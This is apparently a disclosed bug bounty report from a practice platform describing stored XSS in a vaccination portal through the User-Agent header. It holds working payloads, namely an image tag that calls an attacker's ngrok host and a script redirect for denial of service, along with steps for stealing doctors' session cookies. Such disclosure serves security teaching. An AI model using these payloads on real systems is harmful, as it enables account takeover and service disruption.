FirstBlood-#864 — [COLLAB] Stored/Blind XSS / DOS via vaccination portal
This issue was discovered on FirstBlood v2
On 2021-10-29, amec0e Level 3 reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hey mate,
I noticed when we view the vaccination-manager/portal.php endpoint we can see that our User-Agent: is reflected on the page, because there is no filtering in place, a user can upload a vaccination proof image and edit their User-Agent: with a HTML payload which will then fire on the backend to our Ngrok server. Luckily the HttpOnly flag is set for the cookie vaccination_manager and so this token cannot be leaked to our Ngrok address. However, if a doctor has signed in and has not logged out then a attacker can indeed leak the doctorAuthed and drps cookies along with the request due to the lack of a HttpOnly flag set.
It is also possible to cause a Denial of Service to the portal.php endpoint using the payload below as this WILL redirect the admin user to our ngrok address rendering the portal.php endpoint unusable until the injected entry is removed.
<script>window.location.href=`NGROK`</script>
Impact:
We can execute our own HTML because no filters are in place to check that the User-Agent: is properly sanitised when reflected on the portal.php page. We can leak the cookies drps and dcotorAuth which would lead to an account takeover of a doctors account if not signed out when viewing the portal.php. This also leads to a DOS of the portal.php page due to a script redirection.
Steps to Reproduce:
- Visit the endpoint
/vaccination-manager/pub/upload-vaccination-proof.php
- Enter a random email and select a normal image file.
- Open burpsuite and make sure "Intercept is on"
- Click "Upload" and View the Intercepted request.
- Add the following payload along with your Ngrok address in the User-Agent: Header.
<img src=http://NGROKADDRESS>
NOTE:
for DOS of portal.php use the payload below:
<script>window.location.href=`http://NGROKADDRESS/`</script>
- Now "Forward" all requests.
- Visit the endpoint
/vaccination-manager/login.php and Login with valid Credentials
You will now be able to see a hit back to our ngrok address OR if you used the DOS payload you will be redirected to your ngrok address rendering the page unusable by the admin.
DOS Will redirect us to the ngrok default apache page.
Remediation:
Properly sanitise the User-Agent: from HTML tags
Best Regards,
Amec0e.
In Collaboration With thebinarybot
P2 High
Parameter:
Payload:
FirstBlood ID: 29
Vulnerability Type: Stored XSS
When uploading a vaccine proof it is possible to achieve stored XSS against admins set via the user agent. As this value typically can't be user controlled the developers did not think it was 'worth' preventing against XSS.